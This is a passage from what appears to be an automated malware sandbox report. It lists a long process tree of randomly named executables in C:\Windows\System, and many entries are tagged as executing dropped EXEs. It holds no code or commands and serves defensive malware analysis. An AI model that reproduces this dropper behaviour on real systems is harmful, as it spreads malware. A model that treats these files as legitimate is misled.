  C:\Windows\System\puOcrwO.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\mQiwPvb.exe
  C:\Windows\System\mQiwPvb.exe
  2⤵
  - Executes dropped EXE
  PID:4016
- C:\Windows\System\WiKtrJx.exe
  C:\Windows\System\WiKtrJx.exe
  2⤵
  - Executes dropped EXE
  PID:1480
- C:\Windows\System\ejCMevZ.exe
  C:\Windows\System\ejCMevZ.exe
  2⤵
  - Executes dropped EXE
  PID:1268
- C:\Windows\System\fTFRBmG.exe
  C:\Windows\System\fTFRBmG.exe
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Windows\System\zkoUWEC.exe
  C:\Windows\System\zkoUWEC.exe
  2⤵
  - Executes dropped EXE
  PID:228
- C:\Windows\System\vosLNpi.exe
  C:\Windows\System\vosLNpi.exe
  2⤵
  - Executes dropped EXE
  PID:2028
- C:\Windows\System\oUxKbRO.exe
  C:\Windows\System\oUxKbRO.exe
  2⤵
  - Executes dropped EXE
  PID:2084
- C:\Windows\System\mmYKhIS.exe
  C:\Windows\System\mmYKhIS.exe
  2⤵
  - Executes dropped EXE
  PID:3140
- C:\Windows\System\tumoayq.exe
  C:\Windows\System\tumoayq.exe
  2⤵
  - Executes dropped EXE
  PID:4700
- C:\Windows\System\QmSkEJM.exe
  C:\Windows\System\QmSkEJM.exe
  2⤵
  - Executes dropped EXE
  PID:4420
- C:\Windows\System\VXhtUQg.exe
  C:\Windows\System\VXhtUQg.exe
  2⤵
  - Executes dropped EXE
  PID:4252
- C:\Windows\System\oRsmDmk.exe
  C:\Windows\System\oRsmDmk.exe
  2⤵
  - Executes dropped EXE
  PID:5048
- C:\Windows\System\qVNTlEp.exe
  C:\Windows\System\qVNTlEp.exe
  2⤵
  - Executes dropped EXE
  PID:3164
- C:\Windows\System\dAwCgAv.exe
  C:\Windows\System\dAwCgAv.exe
  2⤵
  - Executes dropped EXE
  PID:3828
- C:\Windows\System\GekvfTO.exe
  C:\Windows\System\GekvfTO.exe
  2⤵
  - Executes dropped EXE
  PID:2928
- C:\Windows\System\WgHlNuV.exe
  C:\Windows\System\WgHlNuV.exe
  2⤵
  - Executes dropped EXE
  PID:3616
- C:\Windows\System\UKOrcHl.exe
  C:\Windows\System\UKOrcHl.exe
  2⤵
  - Executes dropped EXE
  PID:2848
- C:\Windows\System\puAKfHd.exe
  C:\Windows\System\puAKfHd.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Windows\System\uXksrPr.exe
  C:\Windows\System\uXksrPr.exe
  2⤵
  - Executes dropped EXE
  PID:2380
- C:\Windows\System\ELRCwRC.exe
  C:\Windows\System\ELRCwRC.exe
  2⤵
  - Executes dropped EXE
  PID:872
- C:\Windows\System\jmDgLNq.exe
  C:\Windows\System\jmDgLNq.exe
  2⤵
  - Executes dropped EXE
  PID:1828
- C:\Windows\System\cGNiZVu.exe
  C:\Windows\System\cGNiZVu.exe
  2⤵
  - Executes dropped EXE
  PID:3588
- C:\Windows\System\sFTDQiJ.exe
  C:\Windows\System\sFTDQiJ.exe
  2⤵
  - Executes dropped EXE
  PID:1488
- C:\Windows\System\ZKtDtmi.exe
  C:\Windows\System\ZKtDtmi.exe
  2⤵
  - Executes dropped EXE
  PID:1492
- C:\Windows\System\lwNhOtx.exe
  C:\Windows\System\lwNhOtx.exe
  2⤵
  - Executes dropped EXE
  PID:3044
- C:\Windows\System\OnludEV.exe
  C:\Windows\System\OnludEV.exe
  2⤵
  - Executes dropped EXE
  PID:3112
- C:\Windows\System\EnaeIMP.exe
  C:\Windows\System\EnaeIMP.exe
  2⤵
  - Executes dropped EXE
  PID:3144
- C:\Windows\System\QUhkPgj.exe
  C:\Windows\System\QUhkPgj.exe
  2⤵
  - Executes dropped EXE
  PID:3476
- C:\Windows\System\JQkSJQG.exe
  C:\Windows\System\JQkSJQG.exe
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\Windows\System\xxTccXb.exe
  C:\Windows\System\xxTccXb.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\DnrscBL.exe
  C:\Windows\System\DnrscBL.exe
  2⤵
  - Executes dropped EXE
  PID:2384
- C:\Windows\System\KYOIhgz.exe
  C:\Windows\System\KYOIhgz.exe
  2⤵
  - Executes dropped EXE
  PID:212
- C:\Windows\System\kKZxXLQ.exe
  C:\Windows\System\kKZxXLQ.exe
  2⤵
  - Executes dropped EXE
  PID:2300
- C:\Windows\System\kLhlTnk.exe
  C:\Windows\System\kLhlTnk.exe
  2⤵
  - Executes dropped EXE
  PID:1168
- C:\Windows\System\fuUvZca.exe
  C:\Windows\System\fuUvZca.exe
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\Windows\System\wpIfkiU.exe
  C:\Windows\System\wpIfkiU.exe
  2⤵
  - Executes dropped EXE
  PID:4376
- C:\Windows\System\qEGFqdt.exe
  C:\Windows\System\qEGFqdt.exe
  2⤵
  - Executes dropped EXE
  PID:2660
- C:\Windows\System\vqiGrkE.exe
  C:\Windows\System\vqiGrkE.exe
  2⤵
  - Executes dropped EXE
  PID:768
- C:\Windows\System\YPiocTP.exe
  C:\Windows\System\YPiocTP.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Windows\System\UjVdgYn.exe
  C:\Windows\System\UjVdgYn.exe
  2⤵
  - Executes dropped EXE
  PID:1348
- C:\Windows\System\ZDFBIzb.exe
  C:\Windows\System\ZDFBIzb.exe
  2⤵
  - Executes dropped EXE
  PID:556
- C:\Windows\System\nrgLBUN.exe
  C:\Windows\System\nrgLBUN.exe
  2⤵
  - Executes dropped EXE
  PID:3876
- C:\Windows\System\ehAxCQb.exe
  C:\Windows\System\ehAxCQb.exe
  2⤵
  - Executes dropped EXE
  PID:3892
- C:\Windows\System\ofESwGn.exe
  C:\Windows\System\ofESwGn.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\zZlnYsp.exe
  C:\Windows\System\zZlnYsp.exe
  2⤵
  - Executes dropped EXE
  PID:1596
- C:\Windows\System\riIuEOf.exe
  C:\Windows\System\riIuEOf.exe
  2⤵
  - Executes dropped EXE
  PID:4884
- C:\Windows\System\AzTatml.exe
  C:\Windows\System\AzTatml.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\UbhwWVg.exe
  C:\Windows\System\UbhwWVg.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Windows\System\fJjYmhc.exe
  C:\Windows\System\fJjYmhc.exe
  2⤵
  - Executes dropped EXE
  PID:3888
- C:\Windows\System\IDktmCV.exe
  C:\Windows\System\IDktmCV.exe
  2⤵
  - Executes dropped EXE
  PID:3200
- C:\Windows\System\RmdCsRP.exe
  C:\Windows\System\RmdCsRP.exe
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Windows\System\YNaFcYS.exe
  C:\Windows\System\YNaFcYS.exe
  2⤵
  - Executes dropped EXE
  PID:3208
- C:\Windows\System\DcOpuWe.exe
  C:\Windows\System\DcOpuWe.exe
  2⤵
  - Executes dropped EXE
  PID:4628
- C:\Windows\System\KsRNPVb.exe
  C:\Windows\System\KsRNPVb.exe
  2⤵
  - Executes dropped EXE
  PID:1260
- C:\Windows\System\UsmpyZc.exe
  C:\Windows\System\UsmpyZc.exe
  2⤵
  - Executes dropped EXE
  PID:3408
- C:\Windows\System\Xebrzmx.exe
  C:\Windows\System\Xebrzmx.exe
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Windows\System\oiBqQBn.exe
  C:\Windows\System\oiBqQBn.exe
  2⤵
  - Executes dropped EXE
  PID:4200
- C:\Windows\System\PUTAcsF.exe
  C:\Windows\System\PUTAcsF.exe
  2⤵
  - Executes dropped EXE
  PID:4076
- C:\Windows\System\BlFQAhT.exe
  C:\Windows\System\BlFQAhT.exe
  2⤵
  - Executes dropped EXE
  PID:4236
- C:\Windows\System\zDHFCuR.exe
  C:\Windows\System\zDHFCuR.exe
  2⤵
  - Executes dropped EXE
  PID:3716
- C:\Windows\System\zkGpQac.exe
  C:\Windows\System\zkGpQac.exe
  2⤵
  PID:436
- C:\Windows\System\WJMeFbt.exe
  C:\Windows\System\WJMeFbt.exe
  2⤵
  PID:3300
- C:\Windows\System\kRYRqiQ.exe
  C:\Windows\System\kRYRqiQ.exe
  2⤵
  PID:3224
- C:\Windows\System\RXpEUUj.exe
  C:\Windows\System\RXpEUUj.exe
  2⤵
  PID:5160
- C:\Windows\System\kjhcNAa.exe
  C:\Windows\System\kjhcNAa.exe
  2⤵
  PID:5180
- C:\Windows\System\EIuvBoW.exe
  C:\Windows\System\EIuvBoW.exe
  2⤵
  PID:5208
- C:\Windows\System\HAweGvN.exe
  C:\Windows\System\HAweGvN.exe
  2⤵
  PID:5236
- C:\Windows\System\mnlmDmL.exe
  C:\Windows\System\mnlmDmL.exe
  2⤵
  PID:5264
- C:\Windows\System\gdCslSb.exe
  C:\Windows\System\gdCslSb.exe
  2⤵
  PID:5296
- C:\Windows\System\QRUyMiA.exe
  C:\Windows\System\QRUyMiA.exe
  2⤵
  PID:5324
- C:\Windows\System\lgVZWKG.exe
  C:\Windows\System\lgVZWKG.exe
  2⤵
  PID:5352
- C:\Windows\System\RVAYQHq.exe
  C:\Windows\System\RVAYQHq.exe
  2⤵
  PID:5376
- C:\Windows\System\AraIfGD.exe
  C:\Windows\System\AraIfGD.exe
  2⤵
  PID:5408
- C:\Windows\System\LFKnGvV.exe
  C:\Windows\System\LFKnGvV.exe
  2⤵
  PID:5436
- C:\Windows\System\OhaEjRf.exe
  C:\Windows\System\OhaEjRf.exe
  2⤵
  PID:5460
- C:\Windows\System\qNHWkta.exe
  C:\Windows\System\qNHWkta.exe
  2⤵
  PID:5488
- C:\Windows\System\YyWenOl.exe
  C:\Windows\System\YyWenOl.exe
  2⤵
  PID:5516
- C:\Windows\System\JFgXrHw.exe
  C:\Windows\System\JFgXrHw.exe
  2⤵
  PID:5544
- C:\Windows\System\qxbTHsy.exe
  C:\Windows\System\qxbTHsy.exe
  2⤵
  PID:5572
- C:\Windows\System\KJTBCkc.exe
  C:\Windows\System\KJTBCkc.exe
  2⤵
  PID:5604
- C:\Windows\System\cnIqIOr.exe
  C:\Windows\System\cnIqIOr.exe
  2⤵
  PID:5632
- C:\Windows\System\tZMCJle.exe
  C:\Windows\System\tZMCJle.exe
  2⤵
  PID:5660
- C:\Windows\System\mzeZPzv.exe
  C:\Windows\System\mzeZPzv.exe
  2⤵
  PID:5688
- C:\Windows\System\FWpUqMY.exe
  C:\Windows\System\FWpUqMY.exe
  2⤵
  PID:5712
- C:\Windows\System\DylKuIY.exe
  C:\Windows\System\DylKuIY.exe
  2⤵
  PID:5744
- C:\Windows\System\FQayzma.exe
  C:\Windows\System\FQayzma.exe
  2⤵
  PID:5772
- C:\Windows\System\RzEoXSr.exe
  C:\Windows\System\RzEoXSr.exe
  2⤵
  PID:5796
- C:\Windows\System\fLisgKz.exe
  C:\Windows\System\fLisgKz.exe
  2⤵
  PID:5828
- C:\Windows\System\OdppyRm.exe
  C:\Windows\System\OdppyRm.exe
  2⤵
  PID:5856
- C:\Windows\System\AlSNLqK.exe
  C:\Windows\System\AlSNLqK.exe
  2⤵
  PID:5884
- C:\Windows\System\DTuupZO.exe
  C:\Windows\System\DTuupZO.exe
  2⤵
  PID:5912
- C:\Windows\System\IgrYeYh.exe
  C:\Windows\System\IgrYeYh.exe
  2⤵
  PID:5940
- C:\Windows\System\PoykwsM.exe
  C:\Windows\System\PoykwsM.exe
  2⤵
  PID:5964
- C:\Windows\System\FwBgAOT.exe
  C:\Windows\System\FwBgAOT.exe
  2⤵
  PID:5996
- C:\Windows\System\CTXlXsU.exe
  C:\Windows\System\CTXlXsU.exe
  2⤵
  PID:6024
- C:\Windows\System\EGZVxmm.exe
  C:\Windows\System\EGZVxmm.exe
  2⤵
  PID:6052
- C:\Windows\System\EFjFQCM.exe
  C:\Windows\System\EFjFQCM.exe
  2⤵
  PID:6084
- C:\Windows\System\MqGtFwf.exe
  C:\Windows\System\MqGtFwf.exe
  2⤵
  PID:6108
- C:\Windows\System\EqlVTkK.exe
  C:\Windows\System\EqlVTkK.exe
  2⤵
  PID:6136
- C:\Windows\System\uCerTpM.exe
  C:\Windows\System\uCerTpM.exe
  2⤵
  PID:4944
- C:\Windows\System\vIiMPXa.exe
  C:\Windows\System\vIiMPXa.exe
  2⤵
  PID:2196
- C:\Windows\System\RPqJDWn.exe
  C:\Windows\System\RPqJDWn.exe
  2⤵
  PID:4680
- C:\Windows\System\ecmxtpp.exe
  C:\Windows\System\ecmxtpp.exe
  2⤵
  PID:3308
- C:\Windows\System\rNNnMAu.exe
  C:\Windows\System\rNNnMAu.exe
  2⤵
  PID:5096
- C:\Windows\System\PaTMVDu.exe
  C:\Windows\System\PaTMVDu.exe
  2⤵
  PID:5196
- C:\Windows\System\iNbqJGN.exe
  C:\Windows\System\iNbqJGN.exe
  2⤵
  PID:5252
- C:\Windows\System\JQZxXjj.exe
  C:\Windows\System\JQZxXjj.exe
  2⤵
  PID:1360
- C:\Windows\System\rojPLuR.exe
  C:\Windows\System\rojPLuR.exe
  2⤵
  PID:5392
- C:\Windows\System\bqbkxNX.exe
  C:\Windows\System\bqbkxNX.exe
  2⤵
  PID:2092
- C:\Windows\System\updtTIv.exe
  C:\Windows\System\updtTIv.exe
  2⤵
  PID:828
- C:\Windows\System\YZdOCRx.exe
  C:\Windows\System\YZdOCRx.exe
  2⤵
  PID:5560
- C:\Windows\System\yRKNXxN.exe
  C:\Windows\System\yRKNXxN.exe
  2⤵
  PID:5616
- C:\Windows\System\wihchxj.exe
  C:\Windows\System\wihchxj.exe
  2⤵
  PID:5676
- C:\Windows\System\qnVqzaI.exe
  C:\Windows\System\qnVqzaI.exe
  2⤵
  PID:5736
- C:\Windows\System\ptDWNaH.exe
  C:\Windows\System\ptDWNaH.exe
  2⤵
  PID:4728
- C:\Windows\System\QLbJiFC.exe
  C:\Windows\System\QLbJiFC.exe
  2⤵
  PID:5844
- C:\Windows\System\XELvzxU.exe
  C:\Windows\System\XELvzxU.exe
  2⤵
  PID:5904
- C:\Windows\System\ciCtMHn.exe
  C:\Windows\System\ciCtMHn.exe
  2⤵
  PID:3080
- C:\Windows\System\iaPPPCr.exe
  C:\Windows\System\iaPPPCr.exe
  2⤵
  PID:6016
- C:\Windows\System\iyPDvjl.exe
  C:\Windows\System\iyPDvjl.exe
  2⤵
  PID:6068
- C:\Windows\System\gdbmVIn.exe
  C:\Windows\System\gdbmVIn.exe
  2⤵
  PID:3764
- C:\Windows\System\dFGenbi.exe
  C:\Windows\System\dFGenbi.exe
  2⤵
  PID:4316
- C:\Windows\System\OtCOMVT.exe
  C:\Windows\System\OtCOMVT.exe
  2⤵
  PID:440
- C:\Windows\System\RnqJDLb.exe
  C:\Windows\System\RnqJDLb.exe
  2⤵
  PID:2328
- C:\Windows\System\jlRJuYs.exe
  C:\Windows\System\jlRJuYs.exe
  2⤵
  PID:5228
- C:\Windows\System\KFQAuGo.exe
  C:\Windows\System\KFQAuGo.exe
  2⤵
  PID:416
- C:\Windows\System\eLRZWEk.exe
  C:\Windows\System\eLRZWEk.exe
  2⤵
  PID:5476
- C:\Windows\System\dCxbMoM.exe
  C:\Windows\System\dCxbMoM.exe
  2⤵
  PID:5592
- C:\Windows\System\wlwVwnj.exe
  C:\Windows\System\wlwVwnj.exe
  2⤵
  PID:5728
- C:\Windows\System\KoggHjC.exe
  C:\Windows\System\KoggHjC.exe
  2⤵
  PID:5840
- C:\Windows\System\dwgDlPc.exe
  C:\Windows\System\dwgDlPc.exe
  2⤵
  PID:5952
- C:\Windows\System\LucEfUa.exe
  C:\Windows\System\LucEfUa.exe
  2⤵
  PID:4468
- C:\Windows\System\hBljvQA.exe
  C:\Windows\System\hBljvQA.exe
  2⤵
  PID:6096
- C:\Windows\System\sRYxWhf.exe
  C:\Windows\System\sRYxWhf.exe
  2⤵
  PID:4248
- C:\Windows\System\dltrdQF.exe
  C:\Windows\System\dltrdQF.exe
  2⤵
  PID:1212
- C:\Windows\System\ZieVdmx.exe
  C:\Windows\System\ZieVdmx.exe
  2⤵
  PID:5308
- C:\Windows\System\lYielNx.exe
  C:\Windows\System\lYielNx.exe
  2⤵
  PID:5532
- C:\Windows\System\vbnOGsF.exe
  C:\Windows\System\vbnOGsF.exe
  2⤵
  PID:5784
- C:\Windows\System\fFcGQzR.exe
  C:\Windows\System\fFcGQzR.exe
  2⤵
  PID:4832
- C:\Windows\System\byfwhVl.exe
  C:\Windows\System\byfwhVl.exe
  2⤵
  PID:6048
- C:\Windows\System\uJUUQUV.exe
  C:\Windows\System\uJUUQUV.exe
  2⤵
  PID:4100
- C:\Windows\System\rKTlzcH.exe
  C:\Windows\System\rKTlzcH.exe
  2⤵
  PID:4556
- C:\Windows\System\hhXdQeN.exe
  C:\Windows\System\hhXdQeN.exe
  2⤵
  PID:5708
- C:\Windows\System\qYgcbXD.exe
  C:\Windows\System\qYgcbXD.exe
  2⤵
  PID:4796
- C:\Windows\System\mBJLeXQ.exe
  C:\Windows\System\mBJLeXQ.exe
  2⤵
  PID:3976
- C:\Windows\System\OvGtBsH.exe
  C:\Windows\System\OvGtBsH.exe
  2⤵
  PID:724
- C:\Windows\System\HtfxiEn.exe
  C:\Windows\System\HtfxiEn.exe
  2⤵
  PID:2756
- C:\Windows\System\NCoqMww.exe
  C:\Windows\System\NCoqMww.exe
  2⤵
  PID:2408
- C:\Windows\System\gJRwYvt.exe
  C:\Windows\System\gJRwYvt.exe
  2⤵
  PID:3720
- C:\Windows\System\cJPvqpn.exe
  C:\Windows\System\cJPvqpn.exe
  2⤵
  PID:800
- C:\Windows\System\tpxzaQD.exe
  C:\Windows\System\tpxzaQD.exe
  2⤵
  PID:1736
- C:\Windows\System\unsYNPn.exe
  C:\Windows\System\unsYNPn.exe
  2⤵
  PID:5424
- C:\Windows\System\OWFLbWJ.exe
  C:\Windows\System\OWFLbWJ.exe
  2⤵
  PID:4900
- C:\Windows\System\jJAbHpU.exe
  C:\Windows\System\jJAbHpU.exe
  2⤵
  PID:5652
- C:\Windows\System\ngUmZzs.exe
  C:\Windows\System\ngUmZzs.exe
  2⤵
  PID:4020
- C:\Windows\System\mwGdFic.exe
  C:\Windows\System\mwGdFic.exe
  2⤵
  PID:4624
- C:\Windows\System\BSSiNQq.exe
  C:\Windows\System\BSSiNQq.exe
  2⤵
  PID:4112
- C:\Windows\System\IWSYhnY.exe
  C:\Windows\System\IWSYhnY.exe
  2⤵
  PID:2996
- C:\Windows\System\vWnPWVX.exe
  C:\Windows\System\vWnPWVX.exe
  2⤵
  PID:4860
- C:\Windows\System\HKOegwt.exe
  C:\Windows\System\HKOegwt.exe
  2⤵
  PID:4528
- C:\Windows\System\WQKLCyx.exe
  C:\Windows\System\WQKLCyx.exe
  2⤵
  PID:2924
- C:\Windows\System\JyBouBp.exe
  C:\Windows\System\JyBouBp.exe
  2⤵
  PID:6164
- C:\Windows\System\epwFPEV.exe
  C:\Windows\System\epwFPEV.exe
  2⤵
  PID:6184
- C:\Windows\System\nXHHaru.exe
  C:\Windows\System\nXHHaru.exe
  2⤵
  PID:6248
- C:\Windows\System\VbUTSdO.exe
  C:\Windows\System\VbUTSdO.exe
  2⤵
  PID:6280
- C:\Windows\System\qTuGYLQ.exe
  C:\Windows\System\qTuGYLQ.exe
  2⤵
  PID:6320
- C:\Windows\System\MJtnjBU.exe
  C:\Windows\System\MJtnjBU.exe
  2⤵
  PID:6340
- C:\Windows\System\zCiAHvx.exe
  C:\Windows\System\zCiAHvx.exe
  2⤵
  PID:6364
- C:\Windows\System\odwwkBT.exe
  C:\Windows\System\odwwkBT.exe
  2⤵
  PID:6388
- C:\Windows\System\CWXBenh.exe
  C:\Windows\System\CWXBenh.exe
  2⤵
  PID:6412
- C:\Windows\System\lFkNofL.exe
  C:\Windows\System\lFkNofL.exe
  2⤵
  PID:6432
- C:\Windows\System\OFKpGnu.exe
  C:\Windows\System\OFKpGnu.exe
  2⤵
  PID:6472
- C:\Windows\System\fWOnatN.exe
  C:\Windows\System\fWOnatN.exe
  2⤵
  PID:6500
- C:\Windows\System\jMSezIR.exe
  C:\Windows\System\jMSezIR.exe
  2⤵
  PID:6524
- C:\Windows\System\KmyynnS.exe
  C:\Windows\System\KmyynnS.exe
  2⤵
  PID:6544
- C:\Windows\System\hZYqSNi.exe
  C:\Windows\System\hZYqSNi.exe
  2⤵
  PID:6576
- C:\Windows\System\PIeNNDQ.exe
  C:\Windows\System\PIeNNDQ.exe
  2⤵
  PID:6592
- C:\Windows\System\ddDfXrW.exe
  C:\Windows\System\ddDfXrW.exe
  2⤵
  PID:6616
- C:\Windows\System\WmGCJLn.exe
  C:\Windows\System\WmGCJLn.exe
  2⤵
  PID:6672
- C:\Windows\System\sckWphN.exe
  C:\Windows\System\sckWphN.exe
  2⤵
  PID:6700
- C:\Windows\System\YNxkqMt.exe
  C:\Windows\System\YNxkqMt.exe
  2⤵
  PID:6724
- C:\Windows\System\xXvrNbF.exe
  C:\Windows\System\xXvrNbF.exe
  2⤵
  PID:6748
- C:\Windows\System\jgzahdk.exe
  C:\Windows\System\jgzahdk.exe
  2⤵
  PID:6764
- C:\Windows\System\oFoXdnF.exe
  C:\Windows\System\oFoXdnF.exe
  2⤵
  PID:6784
- C:\Windows\System\nokqiUU.exe
  C:\Windows\System\nokqiUU.exe
  2⤵
  PID:6816
- C:\Windows\System\EwPToCH.exe
  C:\Windows\System\EwPToCH.exe
  2⤵
  PID:6832
- C:\Windows\System\cEcXjcX.exe
  C:\Windows\System\cEcXjcX.exe
  2⤵
  PID:6888
- C:\Windows\System\ILISEaf.exe
  C:\Windows\System\ILISEaf.exe
  2⤵
  PID:6908
- C:\Windows\System\wcdAnjX.exe
  C:\Windows\System\wcdAnjX.exe
  2⤵
  PID:6928
- C:\Windows\System\EWvnbek.exe
  C:\Windows\System\EWvnbek.exe
  2⤵
  PID:6980
- C:\Windows\System\XxbyCsF.exe
  C:\Windows\System\XxbyCsF.exe
  2⤵
  PID:7004
- C:\Windows\System\yveiykY.exe
  C:\Windows\System\yveiykY.exe
  2⤵
  PID:7024
- C:\Windows\System\YwuzwtC.exe
  C:\Windows\System\YwuzwtC.exe
  2⤵
  PID:7044
- C:\Windows\System\GWYpXiX.exe
  C:\Windows\System\GWYpXiX.exe
  2⤵
  PID:7072
- C:\Windows\System\HeVrmLD.exe
  C:\Windows\System\HeVrmLD.exe
  2⤵
  PID:7092
- C:\Windows\System\LOXkuBv.exe
  C:\Windows\System\LOXkuBv.exe
  2⤵
  PID:7116
- C:\Windows\System\kHupkCc.exe
  C:\Windows\System\kHupkCc.exe
  2⤵
  PID:7132
- C:\Windows\System\Wugeumd.exe
  C:\Windows\System\Wugeumd.exe
  2⤵
  PID:7156
- C:\Windows\System\bmsRxhV.exe
  C:\Windows\System\bmsRxhV.exe
  2⤵
  PID:908
- C:\Windows\System\JpOOtqv.exe
  C:\Windows\System\JpOOtqv.exe
  2⤵
  PID:6180
- C:\Windows\System\pFFVsal.exe
  C:\Windows\System\pFFVsal.exe
  2⤵
  PID:6196
- C:\Windows\System\zqXpROh.exe
  C:\Windows\System\zqXpROh.exe
  2⤵
  PID:6336
- C:\Windows\System\BfUWfcz.exe
  C:\Windows\System\BfUWfcz.exe
  2⤵
  PID:6424
- C:\Windows\System\XrKuuoW.exe
  C:\Windows\System\XrKuuoW.exe
  2⤵
  PID:6488
- C:\Windows\System\oGclzXN.exe
  C:\Windows\System\oGclzXN.exe
  2⤵
  PID:6556
- C:\Windows\System\QXCsDPs.exe
  C:\Windows\System\QXCsDPs.exe
  2⤵
  PID:6664
- C:\Windows\System\PxydJXp.exe
  C:\Windows\System\PxydJXp.exe
  2⤵
  PID:6692
- C:\Windows\System\XEEGiBB.exe
  C:\Windows\System\XEEGiBB.exe
  2⤵
  PID:6796
- C:\Windows\System\HLiwrKd.exe
  C:\Windows\System\HLiwrKd.exe
  2⤵
  PID:6792
- C:\Windows\System\jaZEMXP.exe
  C:\Windows\System\jaZEMXP.exe
  2⤵
  PID:6852
- C:\Windows\System\UBUwLtb.exe
  C:\Windows\System\UBUwLtb.exe
  2⤵
  PID:6924
- C:\Windows\System\MGXybfZ.exe
  C:\Windows\System\MGXybfZ.exe
  2⤵
  PID:6988
- C:\Windows\System\pxCgsqe.exe
  C:\Windows\System\pxCgsqe.exe
  2⤵
  PID:7060
- C:\Windows\System\KLURdqa.exe
  C:\Windows\System\KLURdqa.exe
  2⤵
  PID:7128
- C:\Windows\System\njdqOVB.exe
  C:\Windows\System\njdqOVB.exe
  2⤵
  PID:6160
- C:\Windows\System\RFgcYvD.exe
  C:\Windows\System\RFgcYvD.exe
  2⤵
  PID:6468
- C:\Windows\System\oHkWZRF.exe
  C:\Windows\System\oHkWZRF.exe
  2⤵
  PID:6480
- C:\Windows\System\unnfykd.exe
  C:\Windows\System\unnfykd.exe
  2⤵
  PID:6736
- C:\Windows\System\rIThjFh.exe
  C:\Windows\System\rIThjFh.exe
  2⤵
  PID:6680
- C:\Windows\System\TvcuATY.exe
  C:\Windows\System\TvcuATY.exe
  2⤵
  PID:6844
- C:\Windows\System\XLrLBRv.exe
  C:\Windows\System\XLrLBRv.exe
  2⤵
  PID:7036
- C:\Windows\System\BhatOyM.exe
  C:\Windows\System\BhatOyM.exe
  2⤵
  PID:6384
- C:\Windows\System\gKGTTgD.exe
  C:\Windows\System\gKGTTgD.exe
  2⤵
  PID:6828
- C:\Windows\System\GYRKKrL.exe
  C:\Windows\System\GYRKKrL.exe
  2⤵
  PID:6496
- C:\Windows\System\OnIuIMQ.exe
  C:\Windows\System\OnIuIMQ.exe
  2⤵
  PID:6956
- C:\Windows\System\DhZGSuT.exe
  C:\Windows\System\DhZGSuT.exe
  2⤵
  PID:7176
- C:\Windows\System\BCoZuLw.exe
  C:\Windows\System\BCoZuLw.exe
  2⤵
  PID:7200
- C:\Windows\System\qRrlyOa.exe
  C:\Windows\System\qRrlyOa.exe
  2⤵
  PID:7224
- C:\Windows\System\sMQoJbG.exe
  C:\Windows\System\sMQoJbG.exe
  2⤵
  PID:7244
- C:\Windows\System\WsFPiNG.exe
  C:\Windows\System\WsFPiNG.exe
  2⤵
  PID:7300
- C:\Windows\System\XGdBlSp.exe
  C:\Windows\System\XGdBlSp.exe
  2⤵
  PID:7328
- C:\Windows\System\DoAEYPo.exe
  C:\Windows\System\DoAEYPo.exe
  2⤵
  PID:7348
- C:\Windows\System\vMllixO.exe
  C:\Windows\System\vMllixO.exe
  2⤵
  PID:7376
- C:\Windows\System\GghaDVZ.exe
  C:\Windows\System\GghaDVZ.exe
  2⤵
  PID:7408
- C:\Windows\System\JQtrXrX.exe
  C:\Windows\System\JQtrXrX.exe
  2⤵
  PID:7428
- C:\Windows\System\etlIWXI.exe
  C:\Windows\System\etlIWXI.exe
  2⤵
  PID:7448
- C:\Windows\System\oMSOoRa.exe
  C:\Windows\System\oMSOoRa.exe
  2⤵
  PID:7488
- C:\Windows\System\gDrnTyd.exe
  C:\Windows\System\gDrnTyd.exe
  2⤵
  PID:7544
- C:\Windows\System\HAHYUzl.exe
  C:\Windows\System\HAHYUzl.exe
  2⤵
  PID:7572
- C:\Windows\System\wrIJxmi.exe
  C:\Windows\System\wrIJxmi.exe
  2⤵
  PID:7592
- C:\Windows\System\lGDPxrL.exe
  C:\Windows\System\lGDPxrL.exe
  2⤵
  PID:7632
- C:\Windows\System\pWXHZdY.exe
  C:\Windows\System\pWXHZdY.exe
  2⤵
  PID:7648
- C:\Windows\System\sResvnT.exe
  C:\Windows\System\sResvnT.exe
  2⤵
  PID:7668
- C:\Windows\System\iaYsQzx.exe
  C:\Windows\System\iaYsQzx.exe
  2⤵
  PID:7712
- C:\Windows\System\qRFQvrO.exe
  C:\Windows\System\qRFQvrO.exe
  2⤵
  PID:7728
- C:\Windows\System\ktDRDBd.exe
  C:\Windows\System\ktDRDBd.exe
  2⤵
  PID:7748
- C:\Windows\System\uqjWbOe.exe
  C:\Windows\System\uqjWbOe.exe
  2⤵
  PID:7792
- C:\Windows\System\oGfeioc.exe
  C:\Windows\System\oGfeioc.exe
  2⤵
  PID:7812
- C:\Windows\System\tbxIIqf.exe
  C:\Windows\System\tbxIIqf.exe
  2⤵
  PID:7856
- C:\Windows\System\opFopQU.exe
  C:\Windows\System\opFopQU.exe
  2⤵
  PID:7880
- C:\Windows\System\LpEfdMv.exe
  C:\Windows\System\LpEfdMv.exe
  2⤵
  PID:7908
- C:\Windows\System\vahluoE.exe
  C:\Windows\System\vahluoE.exe
  2⤵
  PID:7924
- C:\Windows\System\FSjCiRT.exe
  C:\Windows\System\FSjCiRT.exe
  2⤵
  PID:7952
- C:\Windows\System\hLJbAQm.exe
  C:\Windows\System\hLJbAQm.exe
  2⤵
  PID:7976
- C:\Windows\System\GyIPKeh.exe
  C:\Windows\System\GyIPKeh.exe
  2⤵
  PID:8024
- C:\Windows\System\riyXTpQ.exe
  C:\Windows\System\riyXTpQ.exe
  2⤵
  PID:8040
- C:\Windows\System\hPvbcUm.exe
  C:\Windows\System\hPvbcUm.exe
  2⤵
  PID:8064
- C:\Windows\System\tmZYKZb.exe
  C:\Windows\System\tmZYKZb.exe
  2⤵
  PID:8084
- C:\Windows\System\WFwjbKS.exe
  C:\Windows\System\WFwjbKS.exe
  2⤵
  PID:8136
- C:\Windows\System\hitEHnZ.exe
  C:\Windows\System\hitEHnZ.exe
  2⤵
  PID:8160
- C:\Windows\System\CvtiEMo.exe
  C:\Windows\System\CvtiEMo.exe
  2⤵
  PID:8188
- C:\Windows\System\ruXYWuA.exe
  C:\Windows\System\ruXYWuA.exe
  2⤵
